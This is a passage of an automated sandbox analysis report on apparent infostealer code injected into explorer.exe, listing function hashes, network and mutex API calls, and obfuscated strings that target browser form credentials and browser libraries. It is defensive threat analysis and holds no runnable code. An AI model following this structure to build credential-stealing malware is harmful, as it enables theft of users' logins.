                                  • Source File: 00000007.00000002.3777784383.000000000C5E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0C5E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c5e0000_explorer.jbxd
                                  Similarity
                                  • API ID: MemoryProtectVirtual
                                  • String ID:
                                  • API String ID: 2706961497-0
                                  • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                  • Instruction ID: bc6841b5de4c366a885b2b240279913e23474dd88669217205647aa9647075de
                                  • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                  • Instruction Fuzzy Hash: BD01A234628B884B8B48EB2C94512A6B3E5FBCE315F000B7EE99AC3241EB21D5024782
                                  Function 0C60C8C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • ObtainUserAgentString.URLMON ref: 0C60C9A0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777784383.000000000C5E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0C5E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c5e0000_explorer.jbxd
                                  Similarity
                                  • API ID: AgentObtainStringUser
                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                  • API String ID: 2681117516-319646191
                                  • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                  • Instruction ID: d90101d548ca87f61b5c8c9f51bac3b68d7d5c0d8d09182cfc96b71b1856ddb6
                                  • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                  • Instruction Fuzzy Hash: DE31D131614A4C8FCB14EFA8C8847EEBBE0FB59205F44022ED85EE7250DE748649C789
                                  Function 0C60C8BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • ObtainUserAgentString.URLMON ref: 0C60C9A0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777784383.000000000C5E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0C5E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c5e0000_explorer.jbxd
                                  Similarity
                                  • API ID: AgentObtainStringUser
                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                  • API String ID: 2681117516-319646191
                                  • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                  • Instruction ID: 2dec0b8dcbcc77232fc312c2504ce975f92443ba702c88b0086f0ec01c183db9
                                  • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                  • Instruction Fuzzy Hash: 7421C370A10A4C8FCB24EFA8C8947EE7BE4FF59205F44422ED85AE7350DE7486098789
                                  Function 0C608B66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148synchronizationCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 232 c608b66-c608b68 233 c608b93-c608bb8 232->233 234 c608b6a-c608b6b 232->234 235 c608bbb-c608bbc 233->235 236 c608b6d-c608b71 234->236 237 c608bbe-c608c22 call c60f612 call c611942 * 2 234->237 235->237 236->235 238 c608b73-c608b92 236->238 246 c608c28-c608c2b 237->246 247 c608cdc 237->247 238->233 246->247 249 c608c31-c608cd3 call c613da4 call c613022 call c6133e2 call c613022 call c6133e2 CreateMutexW 246->249 248 c608cde-c608cf6 247->248 249->247 263 c608cd5-c608cda 249->263 263->248
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777784383.000000000C5E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0C5E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c5e0000_explorer.jbxd
                                  Similarity
                                  • API ID: CreateMutex
                                  • String ID: .dll$el32$kern
                                  • API String ID: 1964310414-1222553051
                                  • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                  • Instruction ID: 623b64fff3b218edf81203140fcb1b2ab1688145ece497e9d2471632da5fb184
                                  • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                  • Instruction Fuzzy Hash: B6414D70918A088FDB68EFA8C4D47ED77F0FB58301F14467AD84AEB2A5DE309945CB85
                                  Function 0C608B72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138synchronizationCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777784383.000000000C5E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0C5E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c5e0000_explorer.jbxd
                                  Similarity
                                  • API ID: CreateMutex
                                  • String ID: .dll$el32$kern
                                  • API String ID: 1964310414-1222553051
                                  • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                  • Instruction ID: dbac96a092df337b7db428da28075b088ced22fda9a9847e575686680450ef11
                                  • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                  • Instruction Fuzzy Hash: A9412B70918A088FDB98EFA8C4987ED77F0FB58301F14417AC84EDB265DE309945CB85
                                  Function 0C60E72E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52networkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 293 c60e72e-c60e768 294 c60e788-c60e7ab connect 293->294 295 c60e76a-c60e782 call c611942 293->295 295->294
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777784383.000000000C5E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0C5E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c5e0000_explorer.jbxd
                                  Similarity
                                  • API ID: connect
                                  • String ID: conn$ect
                                  • API String ID: 1959786783-716201944
                                  • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                  • Instruction ID: e31edc05b8c8d392285182333755751d99ea207ea61ca968a3eaba0cd1f28131
                                  • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                  • Instruction Fuzzy Hash: BC015E30618B1C8FCB98EF1CE088B55B7E0FB59315F1545AED90DCB266C674C8818BC2
                                  Function 0C60E732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 298 c60e732-c60e768 299 c60e788-c60e7ab connect 298->299 300 c60e76a-c60e782 call c611942 298->300 300->299
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777784383.000000000C5E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0C5E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c5e0000_explorer.jbxd
                                  Similarity
                                  • API ID: connect
                                  • String ID: conn$ect
                                  • API String ID: 1959786783-716201944
                                  • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                  • Instruction ID: 83e02b4a6c23bbffb74221ed46ef2df50745228b0a3ef60aeffe6e0f0bcce90c
                                  • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                  • Instruction Fuzzy Hash: 71014470618A1C8FCB98EF5CE048B5577E0FB59315F1545AED90DCB266C774C9818BC2
                                  Function 0C60E6B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53networkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 411 c60e6b2-c60e6e5 412 c60e705-c60e72d send 411->412 413 c60e6e7-c60e6ff call c611942 411->413 413->412
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777784383.000000000C5E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0C5E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c5e0000_explorer.jbxd
                                  Similarity
                                  • API ID: send
                                  • String ID: send
                                  • API String ID: 2809346765-2809346765
                                  • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                  • Instruction ID: c43c3e511a25852701e8f7342f58559c6420e08f18f9d0969d5937540a043a20
                                  • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                  • Instruction Fuzzy Hash: 13011270618A1C8FDB98EF1CE048B2577E0FB58315F1546AED85DCB266C670D881CB85
                                  Function 0C60E5B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49networkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 416 c60e5b2-c60e5ea 417 c60e60a-c60e62b socket 416->417 418 c60e5ec-c60e604 call c611942 416->418 418->417
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777784383.000000000C5E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0C5E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c5e0000_explorer.jbxd
                                  Similarity
                                  • API ID: socket
                                  • String ID: sock
                                  • API String ID: 98920635-2415254727
                                  • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                  • Instruction ID: ba5eb67e7f10a32941b939105623831c7cd9235d4a3dbe552cd857bedf825996
                                  • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                  • Instruction Fuzzy Hash: 48017C30618A1C8FCB84EF1CE048B55BBE0FB59314F1545AEE85ECB266C7B0C9818B86
                                  Function 0C6062DD Relevance: 1.6, APIs: 1, Instructions: 91COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 421 c6062dd-c606320 call c611942 424 c606326 421->424 425 c6063fa-c60640e 421->425 426 c606328-c606339 SleepEx 424->426 426->426 427 c60633b-c606341 426->427 428 c606343-c606349 427->428 429 c60634b-c606352 427->429 428->429 430 c60635c-c60636a call c610f12 428->430 431 c606370-c606376 429->431 432 c606354-c60635a 429->432 430->431 434 c6063b7-c6063bd 431->434 435 c606378-c60637e 431->435 432->430 432->431 438 c6063d4-c6063db 434->438 439 c6063bf-c6063cf call c606e72 434->439 435->434 437 c606380-c60638a 435->437 437->434 440 c60638c-c6063b1 call c607432 437->440 438->426 442 c6063e1-c6063f5 call c6060f2 438->442 439->438 440->434 442->426
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777784383.000000000C5E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0C5E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c5e0000_explorer.jbxd
                                  Similarity
                                  • API ID: Sleep
                                  • String ID:
                                  • API String ID: 3472027048-0
                                  • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                  • Instruction ID: 56ea6bf862e502ba120e2d37f350a0b2397cea2fd51e954b0aaf1c6df8fceee6
                                  • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                  • Instruction Fuzzy Hash: 4C315AB4604B09DEDB7CAF29C0482E6B7A0FB45300F64527EDE2D9A246C7709564CFD1
                                  Function 0C606412 Relevance: 1.5, APIs: 1, Instructions: 46threadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 457 c606412-c606446 call c611942 460 c606473-c60647d 457->460 461 c606448-c606472 call c613c9e CreateThread 457->461
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777784383.000000000C5E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0C5E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c5e0000_explorer.jbxd
                                  Similarity
                                  • API ID: CreateThread
                                  • String ID:
                                  • API String ID: 2422867632-0
                                  • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                  • Instruction ID: 7bfd84896c3c5db6987dcff16bca8be9bb153e58dee1cf82fa6532c8e5d3726c
                                  • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                  • Instruction Fuzzy Hash: 12F0F630268A484FD798EF2CD44567AF3E0FBE9215F45463EA94DC3364DA39C5814716

                                  Non-executed Functions

                                  Function 0C3B0D02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777686452.000000000C390000.00000040.00000001.00040000.00000000.sdmp, Offset: 0C390000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c390000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                  • API String ID: 0-393284711
                                  • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                  • Instruction ID: d63dc563115e2a805394e1ec8ad49a7aa718bca1380cf37e402057e6f4ba114d
                                  • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                  • Instruction Fuzzy Hash: 86E15B70628F488FC765EF68C4947EAB7E0FB58301F504A2E969FD7641DF30A5058B86
                                  Function 0C3B3792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777686452.000000000C390000.00000040.00000001.00040000.00000000.sdmp, Offset: 0C390000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c390000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                  • API String ID: 0-2916316912
                                  • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                  • Instruction ID: 178cd3b9c6181040f41352bd9b6558044831cbad86ad856ab7fd9f72978aab15
                                  • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                  • Instruction Fuzzy Hash: 2EB19930628B488FDB59EF68C485AEEB7F1FF98300F50451ED59AD7261EF7094098B86
                                  Function 0C3B1622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777686452.000000000C390000.00000040.00000001.00040000.00000000.sdmp, Offset: 0C390000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c390000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                  • API String ID: 0-1539916866
                                  • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                  • Instruction ID: aa4e04093c9e0b3d56b5935ffe5b29f875faae4321af26a5c9a1f5417db77e56
                                  • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                  • Instruction Fuzzy Hash: 6241B170B28B088FDB14DF88A4566FD7BE2FB48700F00025ED509E7645DBB59D498BD6
                                  Function 0C3B8AB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777686452.000000000C390000.00000040.00000001.00040000.00000000.sdmp, Offset: 0C390000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c390000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                  • API String ID: 0-355182820
                                  • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                  • Instruction ID: df930cdeb992650f12b7acb3fd3f07d0359b99a4eaadf1506c7f1f3400acab50
                                  • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                  • Instruction Fuzzy Hash: 88C16B70628B098FC758EF28C495AEAF3E5FB98304F40462E959AD7650DF30A519CF87
                                  Function 0C3B8F12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777686452.000000000C390000.00000040.00000001.00040000.00000000.sdmp, Offset: 0C390000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c390000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                  • API String ID: 0-97273177
                                  • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                  • Instruction ID: d7e97e5f2910a838f96028c3d7c56537c65b82c7cb2ea7c49a0e77fa831514de
                                  • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                  • Instruction Fuzzy Hash: 8F51B5315287488FD719DF18C4853EAB7E5FB85704F50192EE9CB97241DBB4950ACF82
                                  Function 0C3B22F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777686452.000000000C390000.00000040.00000001.00040000.00000000.sdmp, Offset: 0C390000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c390000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                  • API String ID: 0-639201278
                                  • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                  • Instruction ID: 24e9c9edaa4b4717d0efee34524e9098a86d9cd418e949a0c515a103a876c402
                                  • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                  • Instruction Fuzzy Hash: 3AC1BF70628A198FC758EF68C495AEAF3E4FB98300F504329954ED7611DF30AA068FC6
                                  Function 0C3B22F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777686452.000000000C390000.00000040.00000001.00040000.00000000.sdmp, Offset: 0C390000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c390000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                  • API String ID: 0-639201278
                                  • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                  • Instruction ID: 14061e84b7d3803691ec2029653e3a2336c2abcf921943483c9e436701fa1025
                                  • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                  • Instruction Fuzzy Hash: E6C1B070628E198FC758EF68C495AEAF3E4FB98300F504329954ED7611DF30AA068FC6
                                  Function 0C3B3CD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777686452.000000000C390000.00000040.00000001.00040000.00000000.sdmp, Offset: 0C390000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c390000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: UR$2$L: $Pass$User$name$word
                                  • API String ID: 0-2058692283
                                  • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                  • Instruction ID: e42a98c31246c3b4a79ccc0fcc10a64ceaf4b340126bf8647c2d1ff7f5db2a7b
                                  • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                  • Instruction Fuzzy Hash: C0A1A170A28B4C8BDB19EF6894447EEB7E1FF84304F40462DD58AE7251DF7095498B8A
                                  Function 0C3B3CE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777686452.000000000C390000.00000040.00000001.00040000.00000000.sdmp, Offset: 0C390000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c390000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: UR$2$L: $Pass$User$name$word
                                  • API String ID: 0-2058692283
                                  • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                  • Instruction ID: b825623ce6250fb8ee1e9e00612cce4c2436508f39e7c0dd6f4440cbd3c5a10d
                                  • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                  • Instruction Fuzzy Hash: A5917170A28B4C8BDB19EF6894447EEB7E1FF84304F40462DD58AE7251DF7095498B8A
                                  Function 0C3B3352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777686452.000000000C390000.00000040.00000001.00040000.00000000.sdmp, Offset: 0C390000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c390000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $.$e$n$v
                                  • API String ID: 0-1849617553
                                  • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                  • Instruction ID: 28e5d966f869c5774d6bf3caea696b5c81efddaffd0b53e4cd1943259f5aaa93
                                  • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                  • Instruction Fuzzy Hash: 2B716031A28B488FD758EF68C4846EAB7F1FF58304F00062ED54AD7661EF7199498B86
                                  Function 0C3AEC32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777686452.000000000C390000.00000040.00000001.00040000.00000000.sdmp, Offset: 0C390000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c390000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 2.dl$dll$l32.$ole3$shel
                                  • API String ID: 0-1970020201
                                  • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                  • Instruction ID: 93c98add2abfca76f5f0fb4c3bf512d08736c566c00cc8b6dc3fadcee8379b42
                                  • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                  • Instruction Fuzzy Hash: 3A514CB0914B4C8BDB65EF68C044BEEB7F1FF58300F40462E959AE7214EF3095558B8A
                                  Function 0C3AF86F Relevance: 6.4, Strings: 5, Instructions: 157COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777686452.000000000C390000.00000040.00000001.00040000.00000000.sdmp, Offset: 0C390000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c390000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4$\$dll$ion.$vers
                                  • API String ID: 0-1610437797
                                  • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                  • Instruction ID: 68ffe05d7502bad84a91f352fbfd573232a01713a1f2e1c1fe7b59aebfd72dc9
                                  • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                  • Instruction Fuzzy Hash: 9B417230229B4C8FCB75EF6898457EAB3E4FB98301F51462E999EC7240EF30D5558B82
                                  Function 0C3B14B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777686452.000000000C390000.00000040.00000001.00040000.00000000.sdmp, Offset: 0C390000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c390000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 32.d$cli.$dll$sspi$user
                                  • API String ID: 0-327345718
                                  • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                  • Instruction ID: 740743a19e86ab3fcd01e1702dcf341c7ccd1a83db23a5533acd2fb1a716f324
                                  • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                  • Instruction Fuzzy Hash: 91417E30A29E0D8FCB54EF6881A57ED73E5FB58300F50156AE90EE7600DA30D544CF86
                                  Function 0C3AF432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777686452.000000000C390000.00000040.00000001.00040000.00000000.sdmp, Offset: 0C390000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c390000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .dll$el32$h$kern
                                  • API String ID: 0-4264704552
                                  • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                  • Instruction ID: 045eed97ca905f54de25b0ae7e2712e138d20845ce72c133a4b48ac34762e91b
                                  • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                  • Instruction Fuzzy Hash: FE418F70618B4C8FD7A9DF6980883AAB7E1FB9C300F104B2E959EC3655DB70C955CB82
                                  Function 0C3B60B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777686452.000000000C390000.00000040.00000001.00040000.00000000.sdmp, Offset: 0C390000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c390000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $Snif$f fr$om:
                                  • API String ID: 0-3434893486
                                  • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                  • Instruction ID: cf1470ead24c34662fb739b74b7fdf0cf8d30bc0a174fd6120c68892a3a9048b
                                  • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                  • Instruction Fuzzy Hash: 1231D03152DF885FC71AEB28C4846EAB7D4FB84300F50491EE59BD7652EE30A549CE43
                                  Function 0C3B60C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777686452.000000000C390000.00000040.00000001.00040000.00000000.sdmp, Offset: 0C390000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c390000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $Snif$f fr$om:
                                  • API String ID: 0-3434893486
                                  • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                  • Instruction ID: b285eecac2434587d1a30f9d615d0c3b8349c37580bb1d7c30671f1f15d0c8b9
                                  • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                  • Instruction Fuzzy Hash: 23310531528F485FD71AEB28C4846EAB3D4FB94300F50491EE59BD7652EE30E509CE43
                                  Function 0C3B1FC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777686452.000000000C390000.00000040.00000001.00040000.00000000.sdmp, Offset: 0C390000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c390000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .dll$chro$hild$me_c
                                  • API String ID: 0-3136806129
